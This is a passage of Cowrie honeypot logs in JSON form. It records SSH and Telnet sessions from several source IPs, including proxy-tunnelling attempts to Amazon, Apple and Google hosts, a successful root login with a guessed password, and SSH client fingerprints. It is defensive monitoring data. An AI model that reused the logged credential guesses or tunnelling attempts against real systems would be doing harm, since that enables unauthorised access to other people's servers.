\\xbf\\x9e\\x93\\xe8\\x9ca\\x02\\xa2\\xcd\\x16x\\x9b\\xc3\\xf0\\xd1\\xe3\\xb5\\xe0\\x7f\\xcdJT\\xbe\\xe7\\x1dZ\\xa6H\\x96\\xa1>\\xdf\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\tM~\\xa1\\xa4d\\xab\\xe8\\xc1\\x9e\\xa8\\x16&\\xff\\xb4u\\x18\\xd6\\xf2\\xf6\\xb4yYm\\x87\\xdf\\x89\\x1b\\xbf\\xec\\xfa@\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":0,"message":"discarded direct-tcp forward request 0 to 108.129.19.169:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa0D\\xf49\\xda\\xe8G\\x0b\\xa3\\xab\\xef\"\\xaa\\xd8\\xb44\\xb9\\x97 ]\\xef\\n\\xff \\xab;\\xbaD\\xa5\\x19\\x9d+ \\xbf\\x9e\\x93\\xe8\\x9ca\\x02\\xa2\\xcd\\x16x\\x9b\\xc3\\xf0\\xd1\\xe3\\xb5\\xe0\\x7f\\xcdJT\\xbe\\xe7\\x1dZ\\xa6H\\x96\\xa1>\\xdf\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\tM~\\xa1\\xa4d\\xab\\xe8\\xc1\\x9e\\xa8\\x16&\\xff\\xb4u\\x18\\xd6\\xf2\\xf6\\xb4yYm\\x87\\xdf\\x89\\x1b\\xbf\\xec\\xfa@\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T02:54:16.623965Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.2.65.48","dst_port":443,"src_ip":"212.227.235.229","src_port":41706,"message":"direct-tcp connection request to 23.2.65.48:443 from 127.0.0.1:41706","sensor":"my-vps","timestamp":"2025-08-26T02:54:16.751286Z","session":"222ba469825a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.2.65.48","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa68\\xb1\\xa7\\xc2I\\xf4ng&\\xf09\\xa5\\x03\\x08n\\xac\\xf8WRW>\\xfe\\x05\\xf0\\xd9Jx)xa\\xc0 +3\\xef&9p-\\xd1\\x98\\x08}GF]\\x8f\\xabe\\x89\\xaab\\xc9[t\\xa3\\x93\\xfd\\x99&b\\xe2X\\r\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xbeP\\x91\\xdd\\xbfF-\\x82E#\\xb45\\xcd\\xd5G\\x83\\t\\x1e\\x16\\x86H}3x\\xc1U-\\x00\\x81\\xe2\\xef \\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":1,"message":"discarded direct-tcp forward request 1 to 23.2.65.48:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xa68\\xb1\\xa7\\xc2I\\xf4ng&\\xf09\\xa5\\x03\\x08n\\xac\\xf8WRW>\\xfe\\x05\\xf0\\xd9Jx)xa\\xc0 +3\\xef&9p-\\xd1\\x98\\x08}GF]\\x8f\\xabe\\x89\\xaab\\xc9[t\\xa3\\x93\\xfd\\x99&b\\xe2X\\r\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xbeP\\x91\\xdd\\xbfF-\\x82E#\\xb45\\xcd\\xd5G\\x83\\t\\x1e\\x16\\x86H}3x\\xc1U-\\x00\\x81\\xe2\\xef \\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T02:54:16.882628Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"212.227.235.229","src_port":42304,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:42304","sensor":"my-vps","timestamp":"2025-08-26T02:54:17.054965Z","session":"222ba469825a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.203.132","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xbc\\xae\\x83ad\\xe8\\x88.\\x0f\\xa5\\xa2EP\"\\xaa\\xf9t\\xbap\\xfb\\xdc:\\x1c\\xe7\\x0f\\xee\\xc7\\xedtfB\\xa4 >\\xc8+\\xf2\\xa0\\x8e\\x0f\\xbd\\x1a\\x080\\xb5\\x13\\xf8\\x8fz\\x7f}2j\\xb1\\x89Q-`\\xbf78?\\xe1\\xc0\\xcc\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc4\\x88\\xd9\\x91u\\xea\\xc4F\\xa4l\\x03\\x00\\x03\\x1f\\xf7\\x9a\\x84\\x83\\x00C=E\\x0c\\xaaK4a\\x12\\xdb\\x87B\\r\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.203.132:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xbc\\xae\\x83ad\\xe8\\x88.\\x0f\\xa5\\xa2EP\"\\xaa\\xf9t\\xbap\\xfb\\xdc:\\x1c\\xe7\\x0f\\xee\\xc7\\xedtfB\\xa4 >\\xc8+\\xf2\\xa0\\x8e\\x0f\\xbd\\x1a\\x080\\xb5\\x13\\xf8\\x8fz\\x7f}2j\\xb1\\x89Q-`\\xbf78?\\xe1\\xc0\\xcc\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xc4\\x88\\xd9\\x91u\\xea\\xc4F\\xa4l\\x03\\x00\\x03\\x1f\\xf7\\x9a\\x84\\x83\\x00C=E\\x0c\\xaaK4a\\x12\\xdb\\x87B\\r\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T02:54:17.451497Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:54:18.037331Z","src_ip":"212.227.235.229","session":"222ba469825a"}
{"eventid":"cowrie.session.connect","src_ip":"185.156.73.233","src_port":47138,"dst_ip":"1.2.3.4","dst_port":22,"session":"24bc3db7d48c","protocol":"ssh","message":"New connection: 185.156.73.233:47138 (1.2.3.4:22) [session: 24bc3db7d48c]","sensor":"my-vps","timestamp":"2025-08-26T02:54:48.666893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-26T02:54:48.667942Z","src_ip":"185.156.73.233","session":"24bc3db7d48c"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-26T02:54:48.688542Z","src_ip":"185.156.73.233","session":"24bc3db7d48c"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123123","message":"login attempt [root/Aa123123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:54:48.795605Z","src_ip":"185.156.73.233","session":"24bc3db7d48c"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:55:03.645247Z","src_ip":"185.156.73.233","session":"24bc3db7d48c"}
{"eventid":"cowrie.session.connect","src_ip":"38.54.108.55","src_port":40668,"dst_ip":"1.2.3.4","dst_port":23,"session":"edc0519c524a","protocol":"telnet","message":"New connection: 38.54.108.55:40668 (1.2.3.4:23) [session: edc0519c524a]","sensor":"my-vps","timestamp":"2025-08-26T02:55:22.649434Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52524,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f6bb348c57a","protocol":"ssh","message":"New connection: 212.227.125.160:52524 (1.2.3.4:22) [session: 3f6bb348c57a]","sensor":"my-vps","timestamp":"2025-08-26T02:55:27.294412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:55:27.295305Z","src_ip":"212.227.125.160","session":"3f6bb348c57a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-